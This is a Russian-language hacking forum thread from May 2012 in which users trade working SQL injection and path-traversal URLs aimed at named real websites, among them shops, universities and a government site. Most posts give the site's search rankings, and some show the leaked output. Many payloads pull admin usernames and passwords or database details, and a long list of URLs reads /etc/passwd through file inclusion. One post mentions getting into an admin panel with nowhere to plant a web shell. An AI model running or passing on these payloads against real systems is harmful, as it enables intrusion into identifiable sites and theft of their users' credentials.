http://www.exp-edition.ru/reviewarticle.php?newsid=1392+and(select+1+from(se lect+count(*),concat((select+(select+database())+f rom+`information_schema`.tables+limit+0,1),floor(r and(0)*2))x+from+`information_schema`.tables+group +by+x)a)+and+1=1
Шоп. PR == 2
PHP:
http://www.vladbaby.ru/?catid=-4+union+select+1,2,3,4,5,database(),7,8--
Вывод в соурс vladbaby_webshop
http://www.interfax-religion.ru/r_logo.gif
http://www.interfax-religion.ru/?act=news&div=-41496%20and%201=2%20union%20select%20concat_ws(0x3 a,@@version,user(),database(),@@version_compile_os ),2,3,4,5,6,7,8,9,10,11,12,13,14,15+--
4.1.25-log religion_main@localhost db_religion_main portbld-freebsd7.1
http://www.denisoudendijk.com/index2.php?id=-37+union+select+1,2,3,4,5,6,7,8,group_concat(user( )),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
deb3422_refunc@localhost
Га-Ноцри
11.05.2012, 00:50
На сон грядущий.
тИЦ (CY) == 30, PR == 2, DMOZ.org == true;
PHP:
http://www.kiteboard.ru/index.php?pid=75&id=-114'+union+select+1,2,3,4,5,6--+h
evwind
http://www.evwind.es/contenidos.php?id_cont=-8 union select 1,2,3,concat_ws(0x3a3a736d696c653a3a,USER,PASS),5, 6,7,8,9 from admin --
lorpen
ttp://www.lorpen.com/lorpen-na/product.php?id=-18 union select 1,2,3,4,concat_ws(0x2e,table_schema,table_name,col umn_name),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 from information_schema.columns where table_name=0x6c6f7270656e5f67656e646572 limit 2,1 --
Code:
http://www.yasminchagas.com.br/hotsites/index.php?id=-37+union+select+1,2,0x6861636b65642062792073757270 72697a,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(), version(),database()),14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30+--+
yasmin@pleskwin21.locaweb-net.locaweb.com.br:4.1.22-community-nt-log:yasmin
sanjulian
http://www.sanjulian.info/index2.php?id_galeria=-1 union select 1,2,3,4,5,6,7,8,9,0,1,2,concat_ws(0x2e,table_schem a,table_name,column_name),4 from information_schema.columns where table_name=0x6461646162696b5f325f67616c6572696173--
Га-Ноцри
11.05.2012, 20:33
Шоп, ТИЦ == 20, PR == 2;
PHP:
http://www.vidatec.ru/show.php?id=82+union+select+1,2,count(*),4,5,6,7,8 ,9+from+vnew_users--
Тиц=850, pr=5, траф>9к
error based
PHP:
http://vitawater.ru/shop/product_info.php?products_id=14348'+and+(select+pr oducts_name+from(select+count(*),concat(database() ,floor(rand(0)*2))x+from+information_schema.tables +group+by+x)a)--'
http://www.bcspeakers.com/INC/news.php?id=-0000000065+union+select+1,user%28%29,3,4,5,6,7--
PR = 4
uscar
http://www.uscar.org/guest/view_team.php?teams_id=11 or 1=(select name from teams union (select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables limit 1 offset 1 )) limit 1 offset 1 )::int--
m0m said:
bcspeakers
Бедный сайт, его уже 4 года подряд хакают
Ereee said:
Бедный сайт, его уже 4 года подряд хакают
Ну что поделаешь, наверно администраторы думают: Если сменить пароли взломы прекратятся.
Теперь взлом данного сайта стал традицией (Как Nasa.gov)
Билеты
http://www.mog-solutions.com/produtos.php?ID=-105 union select 1,2,(select concat_ws(0x2e,ticket_number) from TicketInfo limit 1,1),4,5,6,7,8,9,0,1--
Га-Ноцри
12.05.2012, 22:23
ТИЦ == 160, PR == 3, DMOZ == true, ЯК == true;
PHP:
http://www.photohistory.ru/index.php?pid=1207248187984132+and+(select+1+from( select+count(*),concat(database(),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)--
http://bec.ucla.EDU/news.php?id=-90+union+select+1,version(),3,4,5,6,7,8,9,10,11--
PR 6
http://www.ece.unm.EDU/news.php?id=-363+union+select+1,version(),3,4,5,6,7,8--
PR 5 ТИЦ 30
Га-Ноцри
13.05.2012, 19:41
В меру упитанный сайт.
ТИЦ == 2800, PR == 3, ЯК ==true, DMOZ == true, траф == 12k;
PHP:
http://www.study.ru/test/test.php?id=91'/**/and/**/(select/**/1/**/from(select/**/count(*),concat(database(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
Немного Европы
Inject
_ttp://shanghai.phil-lowe.eu/index.asp?entry_id=8'+and+1=@@version+and+1='1
System User: sa
Inject
_ttp://www.voelkl.eu/index.php?entry_id=8+and+substring((@@version),1,1 )=5
PR=3
В админку попал, шелл лить негде...
cimco
http://www.cimco.com/news_description.php3?id=148 and 1 = (select tablename||chr(58)||rulename from pg_rules limit 1 offset 1)::int--
Га-Ноцри
14.05.2012, 00:04
Не люблю риэлтеров.
PHP:
http://www.nightskyrealty.ru/show_res_lot.php?lot=417+and+(select+1+from( se lect+count(*),concat(database(),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)--
Вывод в
edu
PHP:
http://cs.furman.edu/blog/index.php?id=null%20union%20all%20select%201,group _concat%28id,0x3a,user,0x3a,password%29 ,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23, 24,25,26%20from%20zp_a dministrators--
http://www.bzu.edu.pk/news/newsdesc.php?id=2+and+1=0+union+s elect+1,conca t%28username,0x3a,password%29,3,4 ,5,6%20FROM%20u sers%20--
http://mulibraries.missouri.edu/about/adoptabook/after-details.php?id=-189+u nion+s elect+1,2,3,4,concat%28version%28%2 9,0x3a,u ser%28%29,0x3a,database%28%29%29,6,7,8+f rom+information_Schema.tables
http://www.uta.edu/engineering/50/question.php?id=-1+union+select+1,concat%28username,0x3a,password%2 9,3,4,5,6,7,8,9+from+adlogin
http://www.lspr.edu/dev/news/academic.php?id=-90%20union%20all%20select%201,2,3,4,5,6,group_conc at%28username,0x3a,p assword%29,8%20from%20lspr _l ogin--
http://www.punp.edu.ph/main.php?id=-1+u nion+select+1,2,concat%28login,0x3a,pwd%29, 4,5+f rom+u sers
PHP:
http://www.enlightenmentquartet.com/index.php?id=-999+a nd+1=0+union+all+select+g roup_concat(ID ,0x3a,user_login,0x3a,user_p ass,0x3a,user_emai l),2+from+wp_users--
pr8
Code:
http://www.ied.edu.hk/jol_e-mag/eng/personality.php?article_id=-50'+union+select+1,2,3,concat_ws(0x3a,user(),versi on(),database()),5,6,7+--+
temp_sqlsite42@its8c.ied.edu.hk (mailto:temp_sqlsite42@its8c.ied.edu.hk):4.0.27-standard:temp_sqlsite42
DezMond™
14.05.2012, 18:44
riderstour.de PR3
Code:
http://riderstour.de/index.php?id=262&tx_wfqbe_pi1%5BID%5D=-14928+union+select+1,2,3,4,5,6,7,8,9+--+
livebygrace.com PR0
Code:
http://livebygrace.com/database/admin-list-sign-ups-and-process/edit-delete-sign-ups/?tx_wfqbe_pi1%5Bwfqbe_deleting_mode%5D=1&tx_wfqbe_pi1%5BRID%5D=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user (),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39+--+
eycup.eu PR2
Code:
http://eycup.eu/index.php?id=831&tx_wfqbe_pi1%5BR_ID%5D=-2019+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24+--+
www.arhpanama.org PR3
Code:
http://www.arhpanama.org/html/fileadmin/aplicaciones/viewempresa.php?ecode=-163'+union+select+1,2,3,4,5,6,7,8,9+--+
www.beatpatrol.at PR4
Code:
http://www.beatpatrol.at/index.php?show=gallery&mode=detail&gid=-7+union+select+user()+--+
drops.dagstuhl.de PR6
Code:
http://drops.dagstuhl.de/opus/phpoai/oai2.php?verb=ListRecords&set=ddc:330+and+1=0+union+select+user(),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+&metadataPrefix=oai_dc
www.telethon.ch PR6
Code:
http://www.telethon.ch/index.php?id=87&id_event=-1290+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from +information_schema.tables+--+&L=
www.blv-sport.de PR4
Code:
http://www.blv-sport.de/index.php?id=232&tx_wfqbe_pi1%5Buid%5D=-375+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
www.feierwerk.de PR5
Code:
http://feierwerk.de/programm_gesamt/detail_ansicht.html?tx_wfqbe_pi1%5Beid%5D=-1974+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38+--+
szkolamarzen.pl
PHP:
http://www.szkolamarzen.pl/gim/newsone.php?id=-493+u nion+select+1,g roup_concat%28nazwa,0x3a ,pass%29,3,4,5+from+u sers--
админка
Code:
http://www.szkolamarzen.pl/admin/index.html
Га-Ноцри
14.05.2012, 23:43
ТИЦ ==80, PR ==3, ЯК == true;
PHP:
http://www.fotodeti.ru/foto_b_en.php?id=-11509+union+select+concat_ws(0x03a,user(),database (),version()),2,3,4,5,6,7,8,9,10,11,12--
http://medelana.com
ТИЦ 10
PR 3
http://medelana.com/index.php?m=6-99999999+union+select+1,2,3,4,group_concat%28usern ame,0x3a,password+separator+0x3C62723E%29,6,7,8,9, 10,11,12,13+from+site_db_user--
Га-Ноцри
16.05.2012, 01:37
До админа достучаться не получилось, поэтому, собственно, что-то типа шопа - сайта фирмы.
ТИЦ == 100, PR == 2, ЯК == true, DMOZ == true;
PHP:
http://www.bobrov.ru/catalog/?catid=-193+union+select+1,2,3,4,concat_ws(0x03a,Id,Login, Pass,UserType),6,7,8,9,10,11,12,13,14,15+from+bbr_ users--
ТИЦ == 40, PR == 6/10
PHP:
http://www.bhutan.gov.bt/government/newsDetail.php?id=-695+union+select+1,2,concat%28U SERNAME,0x3a,PA SSW%29,4,5 ,6,7,8+from+users--
motormarkt.nl
PHP:
http://www.motormarkt.nl/newsDetail.php?id=145+u nion+select+1,unhex%28hex %28group_concat%28username,0x3a,password%29%29%29, 3 ,4,5,6,7+from+w ebmasters--
PHP:
http://popidiot.com/template.php?page=../../../../../../../../../../etc/passwd
http://www.cortezart.com/template.php?page=../../../../../../../../../../etc/passwd
http://www.smartwings.cz/home.php?lang=../../../../../../../../../../etc/passwd
http://www.tsotsi.com/english/index.php?m1=../../../../../../../../../../etc/passwd
http://www.sunmoon.ac.kr/~edujp/photo/board.cgi?id=../../../../../../../../../../etc/passwd
http://www.itn-bremen.de/content.php?pid=../../../../../../../../../../etc/passwd
http://vifaphys.tib.uni-hannover.de/index.php?lang=../../../../../../../../../../etc/passwd
http://www.turismomaso.com/index.php?mod=../../../../../../../../../../etc/passwd
http://www.wjbdradio.com/index.php?f=../../../../../../../../../../etc/passwd
http://kyoshkove.com/index.php?d=../../../../../../../../../../etc/passwd
http://arcangel.sakura.ne.jp/hw/jyosai/test/index.php?site_id=../../../../../../../../../../etc/passwd
http://www.shinboai.ed.jp/w/ak/index.php?site_id=../../../../../../../../../../etc/passwd
http://www.c5pba.ca/index.php?page=../../../../../../../../../../etc/passwd
http://www.hiroyaku.jp/touban/index.php?p=../../../../../../../../../../etc/passwd
http://www.tsubasa-ent.co.jp/index.php?P=../../../../../../../../../../etc/passwd
http://etep.duth.gr/index.php?Link=../../../../../../../../../../etc/passwd
http://www.monstermuleys.com/cgi-bin/stories/site.pl?page=../../../../../../../etc/passwd
http://www.olarkin.com/main/dev/index.php?page=../../../../../../etc/passwd
http://www.ecols.com/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
http://www.lifecyclescascadeco.com/index.php?p=../../../etc/passwd%00
http://www.billabong-services.co.uk/index.php?body=../../../../etc/passwd
PHP:
http://www.saladillo.gov.ar/notas.php?id=1+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10--
http://www.thewilliamsbrothers.com/news.php?id=5%20UNION%20SELECT%201,2,3,4,5--
http://www.loopp.com/00/navi/category.php?cate_id=-16161616+union+select+0,1 ,2,3,4,5,6,7,8,9,10,1 1,12,13,14,pw,version(),17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4 2,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58, 59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75 ,76,77+from+users/*
http://www.aquagardenforum.co.il//modules.php?name=Sections&op=printpage&artid=-1+u nion+select+a id,pwd+from+nuke_authors--
http://www.mbp.dt.pl/index1.php?id=-999+and+1=0+union+all+select+1,2--
http://www.gsamicidellapista.nl/amici/data.php?type=1&id=-999+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10, 11,12,1 3,14,15,16,17,18,19--
http://www.syntaxmedia.nl/show-book.php?id=-999+and+1=0+union+all+select+1,2,3,4,5,g roup_con cat%28column_name%29,7,8, 9,10,11,12,13+from+in formation_schema.columns--
http://www.mhcz.beaudini.nl/team/data.php?type=2&id=-999+and+1=0+union+all+select+1,g roup_concat%28ta ble_name%29,g roup_concat%28table_name%29,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19+from+informatio n_schema.tables--
http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=-999+and+1=0+union+all+select+1,group_concat%28tabl e_name%29,3,4,5+f rom+information_schema.tables--
http://home.geoenv.biu.ac.il/lecturer_html.php?id=-129+union+select+1,v ersion%28%29,unhex%28hex%28g roup_concat%28table_name%29%29%29,4,5,6,7,8,9,10,1 1,12,13,14+from+information_schema.tables--
http://www.resq.co.il/news/news_details.php?id=-81+UNION+s elect+1,2,3,4, 5,%27Hacked%20BY%20S ina_C0der%27,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42--
http://www.lostcitypictures.com/more.php?id=-999+and+1=0+u nion+all+select+1,2,3,4,5,6,7--
http://www.vhmarine.com/index2.php?id=-9 99+and+1=0+u nion+all+select+1,2--
http://www.parlidebate.com/index.php?id=-9 99+and+1=0+union+all+select+1,2,3,4,5,6,7+f rom+user--
http://www.thisspartanlife.com/index.php?id=-999+and+1=0+u nion+all+select+1,2,3,4+f rom+ admin_users--
http://www.nomadcharities.org/index.php?id=-999+and+1=0+u nion+all+select+1,g roup_concat% 28table_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21+from+information_schema.tables--
http://www.poeticdiversity.org/main/poemArchive.php?recordID=782+AND+1=0+u nion+all+s elect+1,2,3,4,5,v ersion%28%29,7,8,9--
http://www.ericmarcus.com/content/bookdetail.php?recordID=3+AND+1=0+union+a ll+sele ct+1,version%28%29,3, 4,5,6,7,8,9,10,11,12,13--
http://www.phpstreet.com/winxp.php?id=-1+union+select+0,concat_ws%280x3a,g id,g name,gp wd,gmail%29,2+from+sp_g book
http://www.bellavado.com/news_show.php?id_news=-38+union+select+1,c oncat_ws%280x3a,user_name,0 x3a,u ser_password%29,3,4,5,6,7,8,9+fro%20m+adm inistrators--
http://www.fiacona.org/category_index.php?catid=-95%27+union+select+1,2 ,concat_ws%280x3a,t a ble_name,column_name%29,4,5,6,7,8,9,10,11%20,12,13 ,14,15,16,17,18,19+from+information_schema.columns--%20and%20%271%27=%272
http://www.bkd-bandungkab.com/?fa=content.detail&id=-72+union+select+1,c oncat_ws%280x3a,u serid, username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--
http://www.biocert.or.id/faq.php?id=-127+union+select+1,concat_ws%280x3a,u ser_id,us ername,p assword,group_id,full_name,date_lastlo gin%20,is_active%29,3,4,5+from+tb_user--
http://transitioncoalition.org/transition/assessment_review/view.php?id=7+and+1=0+union+s elect+1,2,concat_ws %280x3a,u sername,password%29,4,5+from+auth_use r--
http://www.eco2000.com.br/capa/ind.php?id=-1+union+select+1,2,3,4,5,6 ,7,8,concat%28user%28% 29,0x3a,database%28%29,0x3a,v ersion%28%29%29,1 0,11,12+--+
http://www.riff.it/php/show.php?id=-261+union+select+1,unhex%28hex%28g roup_concat%28 user_login,0x3a,u ser_pass%29%29%29,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49,50,51,52+from+wp_users--
Га-Ноцри
16.05.2012, 21:21
PR == 5, ТИЦ == 10, DMOZ == true;
PHP:
http://www.countline.lt/amz.php?id=-250+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9--
winstrool
17.05.2012, 11:24
_http://www.optomtovar.ru/view_ad1.php?cat=-28+union+select+(select(@x)from(select(@x:=0x00),( select(0)from(information_schema.columns)where(tab le_schema!=0x696e666f726d6174696f6e5f736368656d61) and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema, 0x2e,table_name,0x3a,column_name))))x)+--+
_http://ref.mobilluck.com.ua/phones_new.php?referal=mobilniy.com.ua&mode=producer&prodid=567+and+(select+version()%3E=(5))+--+
Радио MAXIMUM
http://www.maximum.ru/news/interesting/?id=15317709+and+1=1
http://www.maximum.ru/news/interesting/?id=15317709+and+1=0
_http://www.ue-ticket.de/meinungen/com_detail.php?idcom=-92'+UnIon+selECt+1,2,3,4,5,6,7,(select(@x)from(sel ect(@x:=0x00),(select(0)from(information_schema.co lumns)where(table_schema!=0x696e666f726d6174696f6e 5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723 e,table_schema,0x2e,table_name,0x3a,column_name))) )x),load_file('/etc/passwd'),10,11,12,13,14,15,16,17,18,19,20,21+--+
Га-Ноцри
17.05.2012, 22:45
Суровый эстонский хип-хоп. PR == 4;
PHP:
http://www.hiphop.ee/uritused_comment.php?party_id=-1257+union+select+count(*)+from+users--
ананасы
http://www.anavasi.gr/en/gpsp.php?id=24%20union%20select%201,2,3,4,5,6,7,8, 9,0,1,concat_ws%280x3a,%28select%20%20concat_ws%28 0x2e,anavasi_ana.availability.title%20%29%20from%2 0anavasi_ana.availability%20%20%20limit%201,1%29%2 9,3,4,5,6,7,8--
mog-solutions
http://www.mog-solutions.com/produtos.php?ID=-105 union select 1,2,(select concat_ws(0x2e,ticket_number) from TicketInfo limit 1,1),4,5,6,7,8,9,0,1--
Га-Ноцри
19.05.2012, 00:37
Унылый женский журнал
PHP:
http://sarafan.dp.ua/journal.php?id=-168'+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16--+h
и доска объявлений.
PHP:
http://www.ukrobyava.com.ua/idv.php?id=-21314'+union+select+1,2,3,4,5,6,version(),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28--+h
ТИЦ == 240
PHP:
http://www.image-media.ru/blog/?id=1A%00xa7A%3f
http://www.image-media.ru/partner/
Га-Ноцри
19.05.2012, 02:14
Классика жанра
PHP:
http://www.imperiogrande.ru/catalog.php?categoryid=1&itemid=-230+union+select+1,2,concat_ws(0x03a,login,passwor d),4,5,6,7,8,9,10,11,12+from+users--
PHP:
http://www.sistrom.ru/?lang=-2+union+select+1--
PR == 2
PHP:
http://www.grupo3turismo.com.ar/news.php?id=-1%20union%20all%20select%201,2,unhex%28hex%28gro up_concat%28USR_NAME_LAST,char%2858%29,USR_PWD%29% 29%29 ,4,5,6,7,8,9,10 ,11,12,13%20from%20USERS--
Га-Ноцри
19.05.2012, 02:49
Отвечу не менее классическим error-based'ом, в таком случае
PHP:
http://www.internails.ru/index.php?productID=154+and+(select+1+from(select+ count(*),concat(database(),floor(rand(0)*2))x+from +information_schema.tables+group+by+x)a)--
Code:
http://www.loverussia.name/events_view.php?eid=%28select+table_name+from+%28s elect+count%280%20%29,concat%28%28select%20count%2 8*%29%20from%20user%29,floor%28rand%280%29*2%29%29 +from%20+information_schema.tables+group+by+2+limi t+1%29a%29
HTML:
http://www.trooppage.com/show_product.php?id=-98+union+select+1,2,3,4,5,group_concat(0x03a,usr_u sername,0x03a,usr_password),7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+from+ul_user
http://www.trooppage.com/admin/
<Cyber-punk>
19.05.2012, 22:05
Code:
http://www.ancientexcavation.com/products.php?category_ID=5+AND+1=2+UNION+SELECT+lo ad_file(0x2f6574632f706173737764)--
PR: 2 ТИЦ: 0 G-idx: 1 370 Y-idx: 33
Code:
http://levybaldante.com/news_print.php?id=-1+union+select+load_file(0x2f6574632f706173737764) %2Cload_file(0x2f6574632f706173737764)%2Cload_file (0x2f6574632f706173737764)
PR: 3 ТИЦ: 0 G-idx: 270 Y-idx: 31 Alexa: 12 566 542
Турагентство
PHP:
http://mangodv.ru/index.php?id=strani&strana=59'
Га-Ноцри
21.05.2012, 01:30
Для будущих невест
ТИЦ == 50, PR == 3; ЯК == true;
PHP:
http://wedding-salon.com.ua/index.php?id=main&page=blog&id_news=-38+union+select+1,concat_ws(0x03a,user_id,login,pa ssword,access),3,4,5,6,7,8+from+cns_users--
Вывод в
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot